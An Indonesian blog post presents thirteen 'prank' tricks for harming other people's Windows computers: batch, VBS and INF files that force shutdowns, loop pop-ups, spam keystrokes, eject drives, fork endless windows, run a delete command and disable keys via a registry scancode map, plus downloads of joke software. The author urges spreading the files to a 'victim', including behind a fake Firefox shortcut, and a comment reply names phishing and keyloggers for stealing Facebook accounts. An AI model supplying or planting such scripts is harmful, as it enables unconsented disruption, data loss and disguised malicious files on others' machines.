Trick-trick Hack Komputer Super Jail Dengan Aplikasi Notepad

Pertama dibutuhkan Aplikasi Notepad untuk membuat Jebakan atau Virus ringan hingga yang sangat mematikan. 

Berikut langkah-langkahnya : 

TRIK 1  
Membuat Forced Shoutdown

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

Simpan kode script diatas di Notepad dengan nama: xhack.BAT type file: All file
Sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN

TRIK 2
Membuat Tombol Caps Lock Menyala Terus-Menerus

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Seperti cara yang pertama, hanya berbeda kode script simpan kode dengan nama : xhack.VBS type File : All File
Sebarkan File tersebut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)

TRIK 3
Membuat Pesan Jail Muncul Terus

@ECHO off
:Begin
msg * Please jangan alay
msg * hayo lo,cupu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

Simpan kode script diatas dengan nama xhack.BAT type file : All File
Cara ini sangat simple jail, walaupun di close tab pesan ini masih muncul, kalimatnya bisa diubah sesuai selera.

TRIK 4 
Jail dengan Membuka Tutup CD/DVD Room

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan di Notepad kode tersebut dengan nama : xhack.vbs type file : All File
Maka DVD/CD Room korban akan membuka dan menutup otomatis

TRIK 5 
Membuat Script Muncul Terus-Menerus

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Simpan di Notepad kode tersebut dengan nama : xhack.vbs type file : All File

TRIK 6
Membuat Tombol Backspace Menjadi Error - Menekan Terus-Menerus

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Simpan di Notepad kode tersebut dengan nama : xhack.vbs type file : All File
Maka Tombol Backspace akan error dan menekan dengan sendirinya

TRIK 7 
Cara Membuat Pesan 'Komputer Anda Cupu Banget ' di Notepad/ Wordpad

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"
loop

Simpan di Notepad kode tersebut dengan nama : xhack.vbs type file : All File

TRIK 8 
Cara Membuat Notepad Terbuka Otomatis Terus-Menerus

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan di Notepad kode tersebut dengan nama : xhack.vbs type file : All File

TRIK 9 
Membuat Notepad dengan Pesan Jail

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "

Simpan di Notepad kode tersebut dengan nama : xhack.vbs type file : All File
Ganti kata-kata di atas sesuai dengan selera Anda

TRIK 10
Cara Membuat Memilih Jawaban Seperti Quiz di Notepad

@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * hayo lo, CPU lu gw acak2
msg * udah install ulang aja deh
msg * biar masalahnya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top

Simpan di Notepad kode tersebut dengan nama : xhack.vbs type file : All File

TRIK 11
Membuat Komputer Hang dengan Kode Script Notepad

start

start

start

start

start

start

start

start

start

start

start

start

Simpan di Notepad kode tersebut dengan nama : xhack.vbs type file : All File
Buatlah shortcut palsu, terserah shortcut apa saja, saya sarankan shortcut Mozilla Firefox dan shortcut-nya tempatkan di dekstop target. Efeknya akan membuat CDM yang banyak dan berulang-ulang.

TRIK 12 
Cara Mematikan Tombol Keyboard 
1. Salin baris-baris script berikut , paste pada Notepad dan simpan dengan nama JAIL.INF

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
AddReg =AIUEO

[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,002.    

2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install
3. Log Off komputernya agar trik ini berfungsi.

NB :

Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.

Untuk menormalkannya, silahkan salin script berikut :

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
DelReg =normal

[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”

- Simpan dengan nama NORMAL.INF
- Klik kanan file ini, pilih >Install
- Log Off komputernya.

TRIK 13
Software Buat Jahil

Software 1
Software ini ditemukan di forum Kaskus. Software ini seru banget dan berikut fungsinya:
  • Freeze
  • Snow
  • Earthquake
  • Random colours
  • Mouse and lines
  • Puzzle
Lihat efeknya dibawah
  • Puzzle
  • Mouse And Lines
Dan masih banyak lagi. Cara menghentikan script ini sulit, jika menggunakan tombol Task Manager tidak akan mampan, tombol Start pun tidak akan mampan. Jadi bagaimana cara menghentikannya? Cukup tekan ESC. Silahkan mencoba.
Link Download :  http://www.4shared.com/file/sphJ8tz7/140_Joke.html  

Software 2

Wah kali ini parah banget nih. Bisa bikin stress juga. Sampai sekarang saya pun belum tau cara ngatasinnya. Nama softwarenya Stoerung, sepertinya Bahasa Jerman, pas install pun berbahasa jerman. Software ini meng-invert warna desktop kita berkali-kali secara berkala. Namun efeknya, menurut saya bisa merusak VGA card, dan ini juga bisa bikin komputer lemot. Ini pun sama dengan software  sebelumnya. Ini mengeluarkan alert seperti software 2 namun lebih banyak.
Link Download : http://www.4shared.com/file/gA961mVj/InstallStoerung.html  

About the Author

Blog ini didirikan sejak tahun 2009 oleh Bunga Kurnia yang bukanlah seorang blogger aktif, hanya dikala waktu senggang menyempatkan waktunya untuk menulis blog meskipun dengan tulisan yang tak sempurna dan tak karuan, karena itulah blog ini dinamakan 'menulis bebas'.

Comments

  1. cara ngenhetikannya cuma di restart ya ? gak ada yang lebih mudah ?

    ReplyDelete
    Replies
    1. @Sandy Septian
      Start Task Manager-Click End Task pada "WScript.exe"

      kunjingi:
      http://arif.blogspot.com

      Delete
  2. Replies
    1. Mohon maaf, kalau ingin copy paste artikel saya ini, mohon sertakan link sumbernya. Thanks.

      Delete
    2. Kk Vicky ad FB gak?

      Delete
    3. http://facebook.com/bungavicky

      Delete
  3. trims bro, sangat berguna buat jailin sodara sendiri!!!:D

    ReplyDelete
  4. hacker kode fb gimana yah?

    ReplyDelete
    Replies
    1. Banyak metode yang dapat Anda gunakan, yang paling umum adalah membobol password Facebook menggunakan metode phising, forgot password, keylogger, dsb.

      Delete
  5. this is not a hacker ..
    this is a script kiddie ..

    ReplyDelete
  6. harusnya biar keaslian posting artikelnya terjaga. apapun artikel disini gak bisa di copas, dihilangkan saja fungsi block nya...

    ReplyDelete
    Replies
    1. Artikel2 dari blog ini dapat dicopy asalkan mencantumkan link sumber aslinya.

      Delete
  7. mas bro bgymn lw matiin notepad yg jail ?

    ReplyDelete
  8. terus untuk menghentikanya gimana?

    ReplyDelete
  9. cara menghentikan nya bagaimana

    ReplyDelete
  10. Kayanya Enak Nih Gan..!! Gue Cobain Aja Yeee..??? TANCAB BOSS

    ReplyDelete
  11. itu klo notepadnya di hpus bisa blik lg g'??

    ReplyDelete
  12. cara sebarin file nya biar teman ga tau ada ga :)

    ReplyDelete
  13. gan nih di gue gak berfungsi stelah di pindahkan ke notebook lewat flashdisk help me !

    ReplyDelete
  14. cara ngilangin tulisan nya gimana sob??

    ReplyDelete
  15. haha, ane biasa beli software hack di www.INDONESOFT.net gan
    software hack fb,twitter,instagram,dll...
    sip bngt dah menurut gw...

    ReplyDelete
  16. cara ngatasin yang 13 nya tuh gimana bang?

    ReplyDelete
  17. Ηi there to every body, it's my first pay a visit ᧐f this web site; this
    web site carries awesome and actually good stuff for
    readerѕ.
    see thіs herе : Top Choices Of Encryptіοn Software & How To Ηow
    To Encrypt A Password For Freе Business Using Your Childhood Memories

    ReplyDelete

Post a Comment

Jika tidak punya akun Google+ untuk berkomentar, silahkan pilih opsi 'Anonymous/Tanpa Nama'